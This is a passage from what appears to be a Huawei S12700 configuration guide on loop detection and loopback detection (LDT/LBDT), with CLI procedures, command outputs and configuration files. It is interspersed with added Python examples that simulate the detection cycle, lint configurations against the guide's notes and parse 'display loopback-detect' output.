The command output shows that GE1/0/0 and GE2/0/0 are restored.
----End

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 to 20
#
loop-detection enable
loop-detection interval-time 10
loop-detection enable vlan 10 to 20
#
interface GigabitEthernet1/0/0
port link-type hybrid
port hybrid tagged vlan 10 to 20
stp disable
loop-detection mode port-quitvlan
loop-detection recovery-time 30
#
interface GigabitEthernet2/0/0
port link-type hybrid
port hybrid tagged vlan 10 to 20
stp disable
loop-detection mode port-quitvlan
loop-detection recovery-time 30
#
snmp-agent trap enable feature-name LDTTRAP
#
return
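The detect/act/recover cycle that sections 6.5.1 and 6.5.2 configure, as an added simulation in Python. It is not Huawei's implementation and not part of this document: the probe format, the external_loop fault model and the two scenario functions are constructed for the example. scenario_downstream reproduces the Shutdown case of 6.5.1 (one probe in VLAN 10 returns on GE1/0/1 itself, the interface is shut down and comes back after the default 255 s recovery time), and scenario_local the Quitvlan case of 6.5.2 (probes return on the other interface, only the looping VLANs are removed, and they are restored 30 s after the wiring is corrected). Which side of a two-interface loop ends up quitting a VLAN depends on the order in which probes return, which is why the page calls the VLAN split uncertain; in this deterministic model every VLAN quits on GE2/0/0.

```python
"""Simulation of the LDT detect / act / recover cycle from sections 6.5.1 and 6.5.2.
Added example, not Huawei's implementation; the probe format and fault model are
constructed. Rules modelled: every LDT interface emits one tagged probe per enabled
VLAN each `interval` seconds (and keeps sending while shut down); a probe returning
on the interface that sent it means a loopback there or a loop on the attached
network, one returning on another interface means a loop on the network; the
receiving interface's action applies (port-shutdown/port-block isolate the interface,
port-quitvlan removes only that VLAN); the interface or VLAN is restored once no
probe has returned on it for `recovery_time` seconds."""
from dataclasses import dataclass


@dataclass(frozen=True)
class LdtProbe:
    sender: str   # interface that transmitted the probe
    vlan: int     # VLAN tag carried by the probe
    sent_at: int  # simulated time in seconds


class LoopDetector:
    def __init__(self, vlans, interval=10):
        self.vlans, self.interval = set(vlans), interval
        self.ports = {}  # name -> {"mode", "recovery_time", "loops": {vlan: last_seen}}

    def enable_port(self, name, mode="port-shutdown", recovery_time=255):
        self.ports[name] = {"mode": mode, "recovery_time": recovery_time, "loops": {}}

    def isolated(self, name):
        """Shutdown and Block stop all user traffic on the interface."""
        p = self.ports[name]
        return p["mode"] in ("port-shutdown", "port-block") and bool(p["loops"])

    def carries(self, name, vlan):
        """Does the interface still forward user traffic in this VLAN?"""
        p = self.ports[name]
        if vlan not in self.vlans or self.isolated(name):
            return False
        return not (p["mode"] == "port-quitvlan" and vlan in p["loops"])

    def send_probes(self, now):
        return [LdtProbe(n, v, now) for n in self.ports for v in sorted(self.vlans)]

    def receive(self, probe, arrived_on, now):
        """A probe came back: record the loop on the receiving interface and classify it."""
        self.ports[arrived_on]["loops"][probe.vlan] = now
        return "interface" if probe.sender == arrived_on else "network"

    def tick(self, now):
        """Restore every (interface, VLAN) whose loop has been silent for recovery_time."""
        restored = []
        for name, p in self.ports.items():
            for vlan, seen in list(p["loops"].items()):
                if now - seen >= p["recovery_time"]:
                    del p["loops"][vlan]
                    restored.append((name, vlan))
        return restored

    def status(self):
        """Per-interface view in the spirit of display loop-detection."""
        return {n: {"action": p["mode"], "isolated": self.isolated(n),
                    "loop_vlans": sorted(p["loops"])} for n, p in self.ports.items()}


def external_loop(return_map, fixed_at=None):
    """Constructed fault: a probe sent on port A in VLAN v comes back on return_map[A]
    while both ends still carry v and the wiring has not been corrected (at fixed_at)."""
    def deliver(det, probe):
        back = return_map.get(probe.sender)
        if back is None or (fixed_at is not None and probe.sent_at >= fixed_at):
            return None
        return back if det.carries(probe.sender, probe.vlan) and det.carries(back, probe.vlan) else None
    return deliver


def simulate(det, deliver, duration):
    """Drive the detector for duration seconds; return detection and restoration logs."""
    detections, restorations = [], []
    for now in range(0, duration + 1, det.interval):
        for probe in det.send_probes(now):
            back = deliver(det, probe)
            if back is not None:
                detections.append((now, back, probe.vlan, det.receive(probe, back, now)))
        restorations += [(now, n, v) for n, v in det.tick(now)]
    return detections, restorations


def scenario_downstream(fixed_at=50):
    """6.5.1: loop behind GE1/0/1, Shutdown action, default 255 s recovery time."""
    det = LoopDetector(range(10, 21))
    det.enable_port("GigabitEthernet1/0/1", "port-shutdown", 255)
    loop = external_loop({"GigabitEthernet1/0/1": "GigabitEthernet1/0/1"}, fixed_at)
    return simulate(det, loop, 300) + (det.status(),)


def scenario_local(fixed_at=20):
    """6.5.2: loop between GE1/0/0 and GE2/0/0, Quitvlan action, 30 s recovery time."""
    det = LoopDetector(range(10, 21))
    for port in ("GigabitEthernet1/0/0", "GigabitEthernet2/0/0"):
        det.enable_port(port, "port-quitvlan", 30)
    loop = external_loop({"GigabitEthernet1/0/0": "GigabitEthernet2/0/0",
                          "GigabitEthernet2/0/0": "GigabitEthernet1/0/0"}, fixed_at)
    return simulate(det, loop, 60) + (det.status(),)
```

Each scenario returns the detection log, the restoration log and the final status. In scenario_downstream only VLAN 10 is ever logged, because the shutdown taken on the first returning probe stops the remaining VLANs from being observed (the point of the NOTE in 6.5.1), and GE1/0/1 is restored at the first probe interval after the 255 s recovery time. Calling scenario_downstream(None), a loop nobody fixes, shows the flap the recovery timer produces: the interface is restored at 260 s and shut down again at 270 s.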

6.5.3 Example for Configuring LBDT to Detect Loopbacks on an Interface

LBDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.
Loopback detection (LBDT) periodically sends LBDT packets on an interface to check
whether the packets return to the local device (receive and transmit interfaces can be
different), and determines whether loops occur on the interface, local network, or downstream
network.
l If LBDT packets are received and sent by the same interface, a loopback occurs on the
interface or a loop occurs on the network connected to the interface.
l If LBDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface or device.
After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LBDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.

The problematic interface continues to send LBDT packets. After the configured recovery
time expires, the system attempts to restore the problematic interface. If the device receives
no LBDT packets from the problematic interface within the next recovery time, it considers
that the loop is eliminated on the interface and restores the interface.

LBDT can only detect loops on a single node, but cannot eliminate loops on the entire
network in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST.

Configuration Notes
l This example applies to all versions of the S12700.
l LBDT needs to send a large number of LBDT packets to detect loops, occupying system
resources. Therefore, disable LBDT if loops do not need to be detected.
l LBDT cannot be configured on an Eth-Trunk or its member interfaces.
l Do not use LBDT with ERPS, RRPP, SEP, Smart Link, or STP/RSTP/MSTP/VBST.
l An interface can send LBDT packets with the specified VLAN tag only when the
specified VLAN has been created.
l LBDT can detect loops in a maximum of eight VLANs, and cannot detect loops in
dynamic VLANs.
l When loops in the default VLAN of an interface need to be detected or an interface joins
the detected VLAN in untagged mode, LBDT may fail to detect loops. This is because
the VLAN tag of LBDT packets is removed and the packet priority changes.
l When the Quitvlan action is used, the configuration file remains unchanged.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.
l On a modular switch, LBDT and loop detection (LDT) cannot be configured
simultaneously.
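A static check of the Configuration Notes above (this section's LBDT notes together with the LDT notes in 6.5.1 and 6.5.2), as an added Python example that is not a Huawei tool and not part of this document. It parses the '#'-separated configuration file format the Configuration Files sections show and flags LDT enabled in VLANs that have not been created, LDT and LBDT configured on the same switch, loop detection on an interface where STP is still enabled, LBDT on an Eth-Trunk or one of its member interfaces, and a Shutdown or Block action (Shutdown being the default when no action is configured) on a network-side interface. The network_side parameter, reading Eth-Trunk membership from an eth-trunk line under the interface view, and the constructed BAD_CONFIG are assumptions of the example; SWITCH_6_5_1 is an abridged copy of the configuration file in 6.5.1.

```python
"""Static lint of LDT/LBDT settings against the Configuration Notes on this page.
Added example, not a Huawei tool. It parses the '#'-separated configuration file
format shown in the Configuration Files sections. Assumptions: `network_side` is a
caller-supplied set of uplink interface names, and Eth-Trunk membership is read
from an `eth-trunk <n>` line under the interface view."""


def parse_vlan_list(tokens):
    """Expand "10 to 20" / "2 3" style VLAN lists into a set of IDs."""
    vlans, i = set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def parse_vrp_config(text):
    """Split the file into global commands and per-interface command lists."""
    cfg, current = {"global": [], "interfaces": {}}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("#", "return"):
            current = None                      # '#' closes the current view
        elif line.startswith("interface "):
            current = line.split(None, 1)[1]
            cfg["interfaces"][current] = []
        elif current is not None:
            cfg["interfaces"][current].append(line)
        else:
            cfg["global"].append(line)
    return cfg


def vlans_after(cmds, prefix):
    """Union of the VLAN lists of every command that starts with `prefix`."""
    out = set()
    for c in cmds:
        if c.startswith(prefix + " "):
            out |= parse_vlan_list(c[len(prefix):].split())
    return out


def lint_loop_detection(text, network_side=()):
    """Return (severity, where, message) findings; an empty list means nothing was flagged."""
    cfg, findings = parse_vrp_config(text), []
    created = vlans_after(cfg["global"], "vlan batch")
    ldt_on = "loop-detection enable" in cfg["global"]
    ldt_vlans = vlans_after(cfg["global"], "loop-detection enable vlan")
    if ldt_vlans - created:
        findings.append(("error", "global", f"LDT enabled in VLANs that are not created: {sorted(ldt_vlans - created)}"))
    lbdt_ifaces = {n for n, c in cfg["interfaces"].items() if "loopback-detect enable" in c}
    if ldt_on and lbdt_ifaces:
        findings.append(("error", "global", "LDT and LBDT cannot be configured simultaneously"))
    for name, cmds in cfg["interfaces"].items():
        member = vlans_after(cmds, "port hybrid tagged vlan") | vlans_after(cmds, "port trunk allow-pass vlan")
        member |= vlans_after(cmds, "port hybrid untagged vlan")
        uses_ldt = ldt_on and bool(member & ldt_vlans)   # LDT runs on every interface in a detected VLAN
        uses_lbdt = name in lbdt_ifaces
        if not (uses_ldt or uses_lbdt):
            continue
        if "stp disable" not in cmds:
            findings.append(("warning", name, "STP still enabled; loop detection must not run with STP/RSTP/MSTP/VBST"))
        if uses_lbdt and (name.startswith("Eth-Trunk") or any(c.startswith("eth-trunk ") for c in cmds)):
            findings.append(("error", name, "LBDT cannot be configured on an Eth-Trunk or its member interfaces"))
        action = "shutdown"                     # the default action when none is configured
        for c in cmds:
            for prefix in ("loop-detection mode port-", "loopback-detect action "):
                if c.startswith(prefix):
                    action = c[len(prefix):]
        if name in network_side and action in ("shutdown", "block"):
            findings.append(("error", name, f"{action} action on a network-side interface interrupts all services"))
    return findings


# Abridged configuration file of the Switch from 6.5.1 (copied from this document).
SWITCH_6_5_1 = """#
vlan batch 10 to 20
#
loop-detection enable
loop-detection enable vlan 10 to 20
#
interface GigabitEthernet1/0/1
 port link-type hybrid
 port hybrid tagged vlan 10 to 20
 stp disable
#
return
"""

# Constructed configuration that violates several of the notes.
BAD_CONFIG = """#
vlan batch 10 to 15
#
loop-detection enable
loop-detection enable vlan 10 to 20
#
interface GigabitEthernet1/0/1
 port hybrid tagged vlan 10 to 20
#
interface GigabitEthernet2/0/1
 eth-trunk 1
 loopback-detect enable
 loopback-detect action block
 stp disable
#
return
"""
```

The 6.5.1 configuration passes cleanly when GE1/0/1 is a downstream port, and the same file produces one error as soon as GE1/0/1 is named in network_side, because the default Shutdown action would take the uplink down; that is the check worth wiring into a pre-change review.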

Networking Requirements
As shown in Figure 6-23, aggregation switch SwitchA on an enterprise network connects to
access switch SwitchB. A loopback can occur on the TX-RX interface GE1/0/0 when the
optical fibers are connected incorrectly or the interface is damaged by high voltage, so
SwitchA is required to detect loopbacks on GE1/0/0. Furthermore, it is required that the
interface be blocked to reduce the impact of the loopback on the network when a loopback is
detected, and that the interface be restored after the loopback is removed.


Figure 6-23 Networking for configuring LBDT to detect loopbacks on an interface
[Figure: SwitchA GE1/0/0 (Tx, Rx) linked to SwitchB GE1/0/0]

Configuration Roadmap
To detect loopbacks on downlink interface GE1/0/0 of SwitchA, configure LBDT on GE1/0/0
of SwitchA. The configuration roadmap is as follows:

1. Enable LBDT on GE1/0/0 of SwitchA to detect loopbacks.


2. Configure an action to be taken after a loopback is detected and set the recovery time.
After a loopback is detected, SwitchA blocks the interface to reduce the impact of the
loopback on the network. After the loopback is eliminated, the interface can be restored.

Procedure
Step 1 Enable LBDT on an interface.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] interface gigabitethernet 1/0/0
[SwitchA-GigabitEthernet1/0/0] loopback-detect enable //Enable LBDT on the interface.
[SwitchA-GigabitEthernet1/0/0] quit

Step 2 Configure an action to be taken after a loop is detected and set the recovery time.
[SwitchA] interface gigabitethernet 1/0/0
[SwitchA-GigabitEthernet1/0/0] loopback-detect action block //Configure the Block action to be taken after a loop is detected.
[SwitchA-GigabitEthernet1/0/0] loopback-detect recovery-time 30 //Set the recovery delay to 30s.
[SwitchA-GigabitEthernet1/0/0] quit

Step 3 Verify the configuration.
1. Run the display loopback-detect command to check the LBDT configuration.
[SwitchA] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/0      30              block           NORMAL
----------------------------------------------------------------------------------

The preceding command output shows that the LBDT configuration is successful.
2. After about 5s, run the display loopback-detect command to check whether GE1/0/0 is blocked.
[SwitchA] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/0      30              block           BLOCK(Loopback detected)
----------------------------------------------------------------------------------

The preceding command output shows that GE1/0/0 is blocked, indicating that a loopback occurs on GE1/0/0.
3. Manually remove the loopback. Run the display loopback-detect command to check whether GE1/0/0 is restored.
[SwitchA] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/0      30              block           NORMAL
----------------------------------------------------------------------------------

The preceding command output shows that GE1/0/0 is restored.

----End

Configuration Files
Configuration file of SwitchA
#
sysname SwitchA
#
interface GigabitEthernet1/0/0
loopback-detect recovery-time 30
loopback-detect enable
loopback-detect action block
#
return


6.5.4 Example for Configuring LBDT to Detect Loops on the Downstream Network

LBDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.
Loopback detection (LBDT) periodically sends LBDT packets on an interface to check
whether the packets return to the local device (receive and transmit interfaces can be
different), and determines whether loops occur on the interface, local network, or downstream
network.
l If LBDT packets are received and sent by the same interface, a loopback occurs on the
interface or a loop occurs on the network connected to the interface.
l If LBDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface or device.
After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LBDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.
The problematic interface continues to send LBDT packets. After the configured recovery
time expires, the system attempts to restore the problematic interface. If the device receives
no LBDT packets from the problematic interface within the next recovery time, it considers
that the loop is eliminated on the interface and restores the interface.
LBDT can only detect loops on a single node, but cannot eliminate loops on the entire
network in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST.

Configuration Notes
l This example applies to all versions of the S12700.
l LBDT needs to send a large number of LBDT packets to detect loops, occupying system
resources. Therefore, disable LBDT if loops do not need to be detected.
l LBDT cannot be configured on an Eth-Trunk or its member interfaces.
l Do not use LBDT with ERPS, RRPP, SEP, Smart Link, or STP/RSTP/MSTP/VBST.
l An interface can send LBDT packets with the specified VLAN tag only when the
specified VLAN has been created.


l LBDT can detect loops in a maximum of eight VLANs, and cannot detect loops in
dynamic VLANs.
l When loops in the default VLAN of an interface need to be detected or an interface joins
the detected VLAN in untagged mode, LBDT may fail to detect loops. This is because
the VLAN tag of LBDT packets is removed and the packet priority changes.
l When the Quitvlan action is used, the configuration file remains unchanged.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.
l On a modular switch, LBDT and loop detection (LDT) cannot be configured
simultaneously.

Networking Requirements
As shown in Figure 6-24, a new department of an enterprise connects to the aggregation
switch Switch, and this department belongs to VLAN 100. Loops occur due to incorrect
connections or configurations. As a result, communication on the Switch and uplink network
is affected.

It is required that the Switch should detect loops on the new network to prevent the impact of
loops on the Switch and connected network.

Figure 6-24 Networking for configuring LBDT to detect loops on the downstream network
[Figure: Switch GE1/0/1 connected to the new department network in VLAN 100]

Configuration Roadmap
The new department network has only VLAN 100, so configure LBDT on the Switch to
detect loops. The configuration roadmap is as follows:

1. Enable LBDT on GE1/0/1 of the Switch to detect loops in a specified VLAN so that
loops on the downstream network can be detected.
2. Set LBDT parameters so that the Switch can immediately shut down GE1/0/1 after a
loop is detected. This prevents the impact of the loop on the Switch and connected
network.


NOTE

Configure interfaces on other switching devices as trunk or hybrid interfaces and configure these
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity
on the new network and between the new network and the Switch.

Procedure
Step 1 Enable LBDT on the interface.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] loopback-detect enable //Enable LBDT on the interface.
[Switch-GigabitEthernet1/0/1] quit

Step 2 Specify the VLAN ID of LBDT packets.
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid //The default link type of a switch interface is not hybrid. Run the port link-type hybrid command to configure the link type of the interface as hybrid.
[Switch-GigabitEthernet1/0/1] port hybrid tagged vlan 100
[Switch-GigabitEthernet1/0/1] loopback-detect packet vlan 100 //Enable LBDT to detect loops in VLAN 100.
[Switch-GigabitEthernet1/0/1] quit

Step 3 Configure LBDT parameters.
# Set the interval for sending LBDT packets.
[Switch] loopback-detect packet-interval 10

# Configure an action to be taken after a loop is detected.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] loopback-detect action shutdown //Configure the Shutdown action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/1] quit

Step 4 Verify the configuration.
1. Run the display loopback-detect command to check the LBDT configuration.
[Switch] display loopback-detect
Loopback-detect sending-packet interval: 10
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      -               shutdown        NORMAL
----------------------------------------------------------------------------------

The preceding command output shows that the LBDT configuration is successful.
2. Construct loops on the downstream network and run the display loopback-detect command to check whether GE1/0/1 is shut down.
[Switch] display loopback-detect
Loopback-detect sending-packet interval: 10
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      -               shutdown        SHUTDOWN(Loopback detected)
----------------------------------------------------------------------------------

The preceding command output shows that GE1/0/1 is shut down.

----End

Configuration Files
Configuration file of the switch
#
sysname Switch
#
vlan batch 100
#
loopback-detect packet-interval 10
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
loopback-detect packet vlan 100
loopback-detect enable
#
return

6.5.5 Example for Configuring LBDT to Detect Loops on the Local Network

LBDT Overview
When a loop occurs on a network, broadcast, multicast, and unknown unicast packets are
repeatedly transmitted on the network. This wastes network resources or even causes network
breakdown. Quickly detecting loops on a Layer 2 network can minimize the impact of loops
on the entire network; therefore, a detection technology that notifies users of loops is required.
When a loop occurs, users are requested to check network connections and configurations,
and control the problematic interface.

Loopback detection (LBDT) periodically sends LBDT packets on an interface to check
whether the packets return to the local device (receive and transmit interfaces can be
different), and determines whether loops occur on the interface, local network, or downstream
network.
l If LBDT packets are received and sent by the same interface, a loopback occurs on the
interface or a loop occurs on the network connected to the interface.
l If LBDT packets are received by another interface on the same device, a loop occurs on
the network connected to the interface or device.


After loops are detected, the device can send alarms to the NMS and record logs, and control
the interface status (the interface is shut down by default) according to the device
configuration so that the impact of loops on the device and network is minimized. The device
provides the following actions after LBDT detects a loop:
l Trap: The device reports a trap to the NMS and records a log, but does not take any
action on the interface.
l Block: The device blocks this interface, and can forward only BPDUs.
l No learning: The interface is disabled from learning MAC addresses.
l Shutdown: The device shuts down the interface.
l Quitvlan: The interface is removed from the VLAN where a loop occurs.

The problematic interface continues to send LBDT packets. After the configured recovery
time expires, the system attempts to restore the problematic interface. If the device receives
no LBDT packets from the problematic interface within the next recovery time, it considers
that the loop is eliminated on the interface and restores the interface.

LBDT can only detect loops on a single node, but cannot eliminate loops on the entire
network in the same manner as ring network technologies of ERPS, RRPP, SEP, Smart Link,
and STP/RSTP/MSTP/VBST.

Configuration Notes
l This example applies to all versions of the S12700.
l LBDT needs to send a large number of LBDT packets to detect loops, occupying system
resources. Therefore, disable LBDT if loops do not need to be detected.
l LBDT cannot be configured on an Eth-Trunk or its member interfaces.
l Do not use LBDT with ERPS, RRPP, SEP, Smart Link, or STP/RSTP/MSTP/VBST.
l An interface can send LBDT packets with the specified VLAN tag only when the
specified VLAN has been created.
l LBDT can detect loops in a maximum of eight VLANs, and cannot detect loops in
dynamic VLANs.
l When loops in the default VLAN of an interface need to be detected or an interface joins
the detected VLAN in untagged mode, LBDT may fail to detect loops. This is because
the VLAN tag of LBDT packets is removed and the packet priority changes.
l When the Quitvlan action is used, the configuration file remains unchanged.
l The Quitvlan action cannot be used with GVRP, or the action of removing an interface
from the VLAN where MAC address flapping occurs.
l On a modular switch, LBDT and loop detection (LDT) cannot be configured
simultaneously.

Networking Requirements
As shown in Figure 6-25, a small-scale enterprise uses Layer 2 networking and belongs to
VLAN 100. Because employees often move, the network topology changes frequently. Loops
occur due to incorrect connections or configurations during the change. As a result, broadcast
storms occur and affect communication of the Switch and entire network.

The requirements are as follows:
l The Switch detects loops.


l When a loop exists, the interface is blocked to reduce the impact of the loop on the
Switch and network.
l When the loop is eliminated, the interface can be restored.

Figure 6-25 Networking for configuring LBDT to detect loops on the local network
[Figure: Switch GE1/0/1 and GE1/0/2 connected to the Layer 2 network in VLAN 100]

Configuration Roadmap
To detect loops on the network where the Switch is deployed, configure LBDT on GE1/0/1
and GE1/0/2 of the Switch. In this example, untagged LBDT packets sent by the Switch will
be discarded by other switches on the network. As a result, the packets cannot be sent back to
the Switch, and LBDT fails. Therefore, LBDT is configured in a specified VLAN. The
configuration roadmap is as follows:
1. Enable LBDT on interfaces and configure the Switch to detect loops in VLAN 100 to
implement LBDT on the network where the Switch is located.
2. Configure an action to be taken after a loop is detected and set the recovery time. After a
loop is detected, the Switch blocks the interface to reduce the impact of the loop on the
network. After a loop is eliminated, the interface can be restored.
NOTE

Configure interfaces on other switching devices as trunk or hybrid interfaces and configure these
interfaces to allow packets from corresponding VLANs to pass through to ensure Layer 2 connectivity.

Procedure
Step 1 Enable LBDT on interfaces.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] loopback-detect enable //Enable LBDT on the interface.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] loopback-detect enable //Enable LBDT on the interface.
[Switch-GigabitEthernet1/0/2] quit

Step 2 Specify the VLAN ID of LBDT packets.
[Switch] vlan 100
[Switch-vlan100] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type hybrid //The default link type of a switch interface is not hybrid. Run the port link-type hybrid command to configure the link type of the interface as hybrid.
[Switch-GigabitEthernet1/0/1] port hybrid tagged vlan 100
[Switch-GigabitEthernet1/0/1] loopback-detect packet vlan 100 //Enable LBDT to detect loops in VLAN 100.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type hybrid
[Switch-GigabitEthernet1/0/2] port hybrid tagged vlan 100
[Switch-GigabitEthernet1/0/2] loopback-detect packet vlan 100 //Enable LBDT to detect loops in VLAN 100.
[Switch-GigabitEthernet1/0/2] quit

Step 3 Configure an action to be taken after a loop is detected and set the recovery time.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] loopback-detect action block //Configure the Block action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/1] loopback-detect recovery-time 30 //Set the recovery time to 30s.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] loopback-detect action block //Configure the Block action to be taken after a loop is detected.
[Switch-GigabitEthernet1/0/2] loopback-detect recovery-time 30 //Set the recovery time to 30s.
[Switch-GigabitEthernet1/0/2] quit

Step 4 Verify the configuration.
1. Run the display loopback-detect command to check the LBDT configuration.
[Switch] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      30              block           NORMAL
GigabitEthernet1/0/2      30              block           NORMAL
----------------------------------------------------------------------------------

The preceding command output shows that the LBDT configuration is successful.
2. After about 5s, run the display loopback-detect command to check whether GE1/0/1 or GE1/0/2 is blocked.
[Switch] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      30              block           NORMAL
GigabitEthernet1/0/2      30              block           BLOCK(Loopback detected)
----------------------------------------------------------------------------------

The preceding command output shows that GE1/0/2 is blocked.


3. Shut down GE1/0/1. After 30s, run the display loopback-detect command to check whether GE1/0/2 is restored.
[Switch] display loopback-detect
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      30              block           NORMAL
GigabitEthernet1/0/2      30              block           NORMAL
----------------------------------------------------------------------------------

The preceding command output shows that GE1/0/2 is restored.

----End
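The display loopback-detect output shown in this and the two preceding LBDT examples has a fixed column layout, so a monitoring job that polls the switch can parse it and raise an alert as soon as an interface shows "(Loopback detected)". The following Python is an added example, not code from this document or from Huawei; the sample output it parses is constructed to match the format above, including a shutdown row whose RecoverTime column shows "-".

```python
"""Parse `display loopback-detect` output from an S12700 and flag the interfaces on
which LBDT has acted on a loop.  Added example, not code from the Huawei document."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample, laid out like the command output in the examples above:
# one interface blocked with a 30 s recovery time, one shut down (no recovery time shown).
SAMPLE_OUTPUT = """\
Loopback-detect sending-packet interval: 5
----------------------------------------------------------------------------------
Interface                 RecoverTime     Action          Status
----------------------------------------------------------------------------------
GigabitEthernet1/0/1      30              block           NORMAL
GigabitEthernet1/0/2      30              block           BLOCK(Loopback detected)
GigabitEthernet1/0/3      -               shutdown        SHUTDOWN(Loopback detected)
----------------------------------------------------------------------------------
"""


@dataclass
class LbdtEntry:
    interface: str
    recover_time: Optional[int]  # None where the RecoverTime column shows "-"
    action: str
    status: str

    @property
    def loop_detected(self) -> bool:
        # While LBDT is acting on a loop the status reads e.g. "BLOCK(Loopback detected)".
        return "Loopback detected" in self.status


_INTERVAL = re.compile(r"^Loopback-detect sending-packet interval:\s*(\d+)")
# interface, recover time (number or "-"), action, then the rest of the line as status
_ROW = re.compile(r"^(\S+)\s+(\d+|-)\s+(\S+)\s+(\S.*?)\s*$")


def parse_interval(output: str) -> Optional[int]:
    """Return the LBDT packet-sending interval in seconds, or None if not present."""
    for line in output.splitlines():
        m = _INTERVAL.match(line)
        if m:
            return int(m.group(1))
    return None


def parse_loopback_detect(output: str) -> List[LbdtEntry]:
    """Return one LbdtEntry per interface row; header and separator lines are skipped."""
    entries: List[LbdtEntry] = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("-") or line.startswith("Interface"):
            continue
        m = _ROW.match(line)
        if not m:
            continue  # the interval line, or anything else that is not an interface row
        iface, rt, action, status = m.groups()
        entries.append(LbdtEntry(iface, None if rt == "-" else int(rt), action, status))
    return entries


def interfaces_with_loops(output: str) -> List[str]:
    """Interfaces whose status shows that LBDT has detected a loop; this is the list a
    monitoring job polling the switch would alert on."""
    return [e.interface for e in parse_loopback_detect(output) if e.loop_detected]


if __name__ == "__main__":
    print("interval:", parse_interval(SAMPLE_OUTPUT), "s")
    for entry in parse_loopback_detect(SAMPLE_OUTPUT):
        print(entry)
    print("loops on:", interfaces_with_loops(SAMPLE_OUTPUT))
```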

Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 100
#
interface GigabitEthernet1/0/1
port link-type hybrid
port hybrid tagged vlan 100
loopback-detect recovery-time 30
loopback-detect packet vlan 100
loopback-detect enable
loopback-detect action block
#
interface GigabitEthernet1/0/2
port link-type hybrid
port hybrid tagged vlan 100
loopback-detect recovery-time 30
loopback-detect packet vlan 100
